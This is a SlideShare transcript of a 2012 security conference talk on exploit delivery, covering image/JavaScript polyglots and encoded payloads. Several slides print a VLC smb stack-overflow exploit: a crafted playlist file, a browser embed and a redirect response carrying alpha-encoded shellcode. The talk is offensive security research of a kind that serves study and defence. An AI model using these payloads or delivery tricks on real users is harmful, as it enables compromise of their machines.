• Save
Innovative Exploit Delivery
Upcoming SlideShare
Loading in...5
×
 

Like this? Share it with your network

Share

Innovative Exploit Delivery

on

  • 2,749 views

Behind every successful exploit is a good delivery mechanism. This talk combines my research in exploit writing, browser and PDF exploitation, web hacking and old school data representation ...

Behind every successful exploit is a good delivery mechanism. This talk combines my research in exploit writing, browser and PDF exploitation, web hacking and old school data representation techniques, bringing you a slew of creative and innovative tricks and techniques to send exploits successfully to the victim's doorstep.

Never before has the fine art of packaging been more important when it comes to exploit delivery. Advances in HTML standards, newer trends with HTTP, new techniques of consuming web resources and multiple ways of data representation make it possible to come up with tricks like "Javascript chameleons", "shortened exploits", "exploitation by painting" and other creative techniques.

Statistics

Views

Total Views
2,749
Views on SlideShare
2,665
Embed Views
84

Actions

Likes
2
Downloads
0
Comments
1

4 Embeds 84

https://twitter.com 51
http://brovary-osvita-test.edukit.kiev.ua 28
http://www.linkedin.com 4
https://www.linkedin.com 1

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
  • Yeah, but can you exploit it on latest Linux amd64 with all the new gcc patches, PIE, stack cookies, ASLR, heap protection, etc? No...
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

Innovative Exploit Delivery Presentation Transcript

  • 1. INNOVATIVE EXPLOIT DELIVERY SAUMIL SHAHnet-square HITB2012KUL
  • 2. # who am iSaumil Shah, CEO Net-Square.• Hacker, Speaker, Trainer, Author - 15 yrs in Infosec.• M.S. Computer Science Purdue University.• saumil@net-square.com• LinkedIn: saumilshah• Twitter: @therealsaumilnet-square
  • 3. My area of work Penetration Reverse Exploit Testing Engineering Writing New Offensive Attack Research Security Defense Conference "Eyes and Speaker ears open"net-square
  • 4. When two forces combine... Web Binary Hacking Exploitsnet-square
  • 5. SNEAKY LETHALnet-square
  • 6. net-square
  • 7. 302 IMG JS HTML5net-square
  • 8. net-square
  • 9. VLC smb overflow• smb://example.com@0.0.0.0/foo/#{AAAA AAAA....}• Classic Stack Overflow.net-square
  • 10. VLC XSPF file<?xml version="1.0" encoding="UTF-8"?><playlist version="1" xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/"> <title>Playlist</title> <trackList> <track> <location> smb://example.com@0.0.0.0/foo/#{AAAAAAAA....} </location> <extension application="http://www.videolan.org/vlc/playlist/0"> <vlc:id>0</vlc:id> </extension> </track> </trackList></playlist> net-square
  • 11. Alpha Encoded Tiny ZOMFG Exploit URLnet-square
  • 12. 100% Pure Alphanum!net-square
  • 13. VLC smb overflow - HTMLized!!<embed type="application/x-vlc-plugin" width="320" height="200" target="http://tinyurl.com/ycctrzf" id="vlc" /> net-square
  • 14. 301 Redirect from tinyurlHTTP/1.1 301 Moved PermanentlyX-Powered-By: PHP/5.2.12Location:smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAj4?wTYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJICVK1JjIoFoQRPRBJGrChJmDnElGuBzCDHoOHF4P0P0CgLKHzNOQeIzNOCEJGIoM7AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAT00WT00WWYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLIxCtGpC0GpLKQUGLNkQlFeD8GqHoLKPOEHLKCoQ0EQHkQYLKP4NkEQJNP1KpNyNLMTIPQdC7KqIZDMC1O2JKL4GKCdGTGtBUIuLKQOQ4EQHkPfLKDLBkLKCoGlEQJKLKGlLKEQHkOyClQ4GtJcEaIPBDNkG0P0MUIPCHDLLKG0FlNkPpGlNMNkE8GxHkEYLKOpH0EPC0EPLKQxGLQOEaJVQpCfOyHxOsIPCKBpCXHpLJC4QOPhJ8KNNjDNF7KOIwPcCQPlQsDnCUCHPeEPAA}Content-type: text/htmlContent-Length: 0Connection: closeServer: TinyURL/1.6 net-square
  • 15. net-square
  • 16. Exploits as Images - 1• Grayscale encoding (0-255).• 1 pixel = 1 character.• Perfectly valid image.• Decode and Execute!net-square
  • 17. net-square
  • 18. Im an evil Javascript Im an innocent imagenet-square
  • 19. <CANVAS>net-square
  • 20. net-square c) no eval()
  • 21. Same Same No Different! var a = eval(str); a = (new Function(str))();net-square
  • 22. d) IMAJSnet-square
  • 23. IMAJS Seeing is Believingnet-square
  • 24. Browser Support for IMAJS-GIFHeight Width Browser/Viewer Image Javascript Renders? Executes?2f 2a 00 00 Firefox yes yes2f 2a 00 00 Safari yes yes2f 2a 00 00 IE no yes2f 2a 00 00 Chrome yes yes2f 2a 00 00 Preview.app yes -2f 2a 00 00 XP Image Viewer no -2f 2a 00 00 Win 7 Preview yes -net-square
  • 25. Browser Support for IMAJS-BMPHeight Width Browser/Viewer Image Javascript Renders? Executes?2f 2a 00 00 Firefox yes yes2f 2a 00 00 Safari yes yes2f 2a 00 00 IE yes yes2f 2a 00 00 Chrome yes yes2f 2a 00 00 Opera yes yes2f 2a 00 00 Preview.app yes -2f 2a 00 00 XP Image Viewer yes -2f 2a 00 00 Win 7 Preview yes -net-square
  • 26. e) The αq exploitnet-square
  • 27. Encode using Alpha channelnet-square
  • 28. Demo IMAJS αq FTW!net-square
  • 29. f) ONE LAST DEMO!!! net-square
  • 30. The FUTURE? HTML5 Video SVG WebGL Mobile Browsersnet-square
  • 31. KTHXBAI See you in 2013??net-square saumil@net-square.com | @therealsaumil